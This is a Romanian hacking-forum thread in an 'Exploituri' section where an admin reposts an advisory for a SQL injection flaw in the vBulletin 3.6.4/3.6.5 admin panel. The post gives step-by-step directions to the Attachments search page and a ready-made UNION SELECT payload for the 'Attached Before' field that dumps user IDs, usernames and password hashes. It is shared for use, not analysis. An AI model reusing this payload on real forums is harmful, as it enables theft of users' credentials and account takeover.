vbulletin admincp sql

Asasinu
Welcome To Asasinu!!! Please Register To Have Acces To Evrithing !!! !FORUMUL ESTE IN PLINA DEZVOLTARE VA RUGAM SA NE AJUTATI!

Lista Forumurilor Pe Tematici

Asasinu | Reguli | Inregistrare | Login

POZE ASASINU

Nu sunteti logat.

Nou pe simpatie:
Stefania23

Femeie
24 ani
Dolj
cauta Barbat
25 - 46 ani

Asasinu / Exploituri / vbulletin admincp sql

Moderat de Marius93, lypanu06

Autor

Mesaj

Pagini: 1

Asasin
<<ADMIN>>

Din: Caracal
Inregistrat: acum 17 ani
Postari: 635

:

/****************************************/

CREDIT:
discovered by meto5757 and disfigure

PRODUCT:
vBulletin

VULNERABILITY:
SQL Injection

NOTES:
- not a serious vulnerability, can only be used by administrator of site
- SQL injection can be used to obtain password hash
- tested on 3.6.4 and 3.6.5

POC:
1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:

') union select 1,1,1,1,1,userid,password,1,username from user -- 9

greets: No_Advertising.com

/****************************************/

_______________________________________

إلا الموتى وشهدت نهاية الحرب

pus acum 17 ani

Pagini: 1

Mergi la